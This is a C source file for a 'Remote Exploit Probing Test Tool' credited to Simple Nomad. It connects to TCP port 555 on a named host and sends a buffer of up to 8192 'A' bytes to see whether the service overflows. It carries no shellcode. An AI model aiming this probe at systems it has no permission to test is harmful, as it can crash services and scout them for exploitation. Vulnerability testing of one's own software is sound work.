/*
 * exploit_probe test tool
 * 
 * *** PRIVATE -- DO NOT DISTRIBUTE ***
 *
 * compile with gcc -ggdb -o exploit_probe exploit_probe.c
 *
 */

/* includes */
#include <sys/types.h>
#include <sys/socket.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
//#include <signal.h>
#include <ctype.h>
#include <netdb.h>
#if defined (__OpenBSD__) || defined (__NetBSD__)
#include <limits.h>
#endif

/* defines */
/* Tool version string, printed in the startup banner. */
#define VERSION "1.0"
/* Size in bytes of the on-stack payload buffer declared in main(). */
#define MAXBUF 8192

/*
 * usage - print the command-line synopsis to stderr.
 *
 * prog: program name to show in the synopsis (main passes argv[0]).
 */
void usage(char *prog)
{
  FILE *out = stderr;

  fputs("USAGE: ", out);
  fprintf(out, "%s <size> <target>\n\n", prog);
}


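/*
 * main - resolve <target>, connect to TCP port 555 and send <size> bytes.
 *
 * argv[1] is the payload size in bytes and argv[2] is the target host name
 * or address. The payload is size-1 'A' characters followed by a NUL byte.
 *
 * The size is checked against the range 1..MAXBUF before it is used as an
 * index or a length: the payload is built in a fixed MAXBUF-byte stack
 * buffer, so an unchecked value would write outside that buffer in this
 * process (a zero or negative value would also index before its start).
 *
 * Exit status: 0 on success, -1 on bad arguments or an unresolvable host,
 * 1 on socket, connect or write failure.
 */
int main(int argc, char **argv)
{
  struct sockaddr_in address;
  struct hostent *hp;
  char buffer[MAXBUF];
  char *prog = argv[0];
  char *end = NULL;
  long requested;
  int size;
  int sockfd;
  ssize_t sent;

  printf("Remote Exploit Probing Test Tool, v%s\n",VERSION);
  printf("Simple Nomad <thegnome@nmrc.org>\n\n");

  if (argc <= 2)
  {
    usage(prog);
    exit(-1);
  }

  /*
   * Reject non-numeric, trailing-garbage and out-of-range sizes. A value
   * that overflows long is clamped by strtol to LONG_MIN/LONG_MAX and is
   * therefore caught by the range test as well.
   */
  requested = strtol(argv[1], &end, 10);
  if (end == argv[1] || *end != '\0' || requested < 1 || requested > MAXBUF)
  {
    fprintf(stderr, "[!] Invalid size %s, must be between 1 and %d\n",
            argv[1], MAXBUF);
    usage(prog);
    exit(-1);
  }
  size = (int)requested;

  hp = gethostbyname(argv[2]);
  if (hp == NULL)
  {
    printf("Unable to resolve %s, unknown host\n", argv[2]);
    exit(-1);
  }

  /* Only copy the address if it really is an IPv4 address of the right size. */
  if (hp->h_addrtype != AF_INET || hp->h_addr_list[0] == NULL ||
      (size_t)hp->h_length != sizeof(address.sin_addr))
  {
    fprintf(stderr, "[!] No IPv4 address found for %s\n", argv[2]);
    exit(-1);
  }

  sockfd = socket(AF_INET, SOCK_STREAM, 0);
  if (sockfd == -1)
  {
    perror("[!] socket");
    exit(1);
  }

  /* Zero the whole struct so padding and sin_zero are not stack garbage. */
  memset(&address, 0, sizeof(address));
  address.sin_family = AF_INET;
  /* memcpy avoids dereferencing h_addr_list[0] through a cast pointer. */
  memcpy(&address.sin_addr, hp->h_addr_list[0], sizeof(address.sin_addr));
  address.sin_port = htons(555); // tcp port

  printf("[+] Connecting to host\n");

  if (connect(sockfd, (struct sockaddr *)&address, sizeof(address)) == -1)
  {
    printf("[!] Unable to connect to server %s\n",argv[2]);
    close(sockfd);
    exit(1);
  }

  printf("[+] Connected\n");
  printf("[+] Building payload of %d \"A\"s\n",size);

  /* Fill with 'A' and terminate; size is known to be within 1..MAXBUF. */
  memset(buffer, '\x41', (size_t)size);
  buffer[size-1] = 0;

  printf("[+] Sending probe\n");
  sent = write(sockfd, buffer, (size_t)size);
  if (sent != (ssize_t)size)
  {
    /* Covers both an error (-1) and a short write. */
    fprintf(stderr, "[!] Write failed or was short (%ld of %d bytes)\n",
            (long)sent, size);
    close(sockfd);
    exit(1);
  }

  /* Pause before closing, as the original did. */
  sleep(1);
  printf("[+] Probe sent, closing socket\n");
  close(sockfd);

  exit(0);
}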

